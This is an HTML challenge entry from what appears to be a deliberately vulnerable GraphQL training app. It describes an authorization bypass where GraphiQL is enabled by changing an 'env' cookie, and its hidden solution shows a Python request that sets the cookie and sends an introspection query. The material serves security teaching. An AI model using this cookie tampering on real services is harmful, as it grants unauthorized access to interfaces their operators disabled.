<!-- Start -->
<h3 style="color:purple" id="bypassauthz-igql"><b>Authorization Bypass :: GraphQL Interface Protection Bypass</b></h3>
<hr />
<h5>Problem Statement</h5>
<p>
  GraphiQL is available at the path <code>/graphiql</code> with a poorly implemented authorization check.
</p>
<h5>Resources</h5>
<ul>
  <li>
    <a href="https://cwe.mitre.org/data/definitions/639.html" target="_blank">
      <i class="fa fa-newspaper"></i> CWE-639 - Authorization Bypass Through User-Controlled Key
    </a>
  </li>
</ul>
<h5>Exploitation Solution <button class="reveal" onclick="reveal('sol-brokenauthz-igql')">Show</button></h5>
<div id="sol-brokenauthz-igql" style="display:none">
  <pre class="bash">
# Beginner mode

# Cookie 'env' stores a string with an instruction to disable graphiql. altering the value to contain graphiql:enable will bypass the protection

# Alter the env cookie to change "graphiql:disable" to "graphiql:enable" to bypass this check:
requests.post('http://host/graphiql',
  json={"query":"query IntrospectionQuery{__schema {queryType { name } mutationType { name } subscriptionType { name }}}"},
  cookies={'env':'graphiql:enable'}
)

# Expert mode
# GraphiQL interface is disabled.</pre>
</div>
<!-- End -->